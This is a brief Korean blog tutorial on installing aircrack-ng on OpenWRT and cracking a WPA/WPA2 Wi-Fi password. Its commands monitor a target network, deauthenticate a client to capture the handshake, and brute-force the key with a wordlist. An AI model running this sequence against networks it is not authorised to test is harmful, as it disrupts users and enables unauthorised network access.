OS 운영체제/OpenWRT

[OpenWRT] aircrack-ng 사용법

쉬고싶은 거북이 2023. 9. 21. 17:34

설치

opkg update && opkg install aircrack-ng

 

 # 전체 모니터링 ### 랜드라이버 모드 모니터링으로 변경
airodump-ng wlan1

 


# 특정 BSSID 모니터링 -c [채널] -w [저장할 파일이름] ### STATION 주소 구하기
airodump-ng -c 1 --bssid 88:36:6C:C1:3D:FA -w psk wlan1

 # 연결 끊기 -a [타겟] -c [공격자] ### WPA handshake 구하기
aireplay-ng -0 5 -a 88:36:6C:C1:3D:FA -c 4A:E9:C1:AE:80:9B wlan1

 # 패스워드 무차별 대입 -w [읽을리스트] -b [BSSID]   ### WPA handshake 필요
aircrack-ng -w password.lst -b 88:36:6C:C1:3D:FA psk*.cap


 

참조

https://www.aircrack-ng.org/doku.php?id=cracking_wpa 

 

cracking_wpa [Aircrack-ng]

Tutorial: How to Crack WPA/WPA2 Version: 1.20 March 07, 2010 By: darkAudax Introduction This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is.

www.aircrack-ng.org

https://github.com/aircrack-ng/aircrack-ng/blob/master/test/password.lst

 

 

GitHub - aircrack-ng/aircrack-ng: WiFi security auditing tools suite

WiFi security auditing tools suite. Contribute to aircrack-ng/aircrack-ng development by creating an account on GitHub.

github.com

 

'OS 운영체제 > OpenWRT' 카테고리의 다른 글

[OpenWrt] iptime 펌웨어 복구하기  (0) 2023.05.15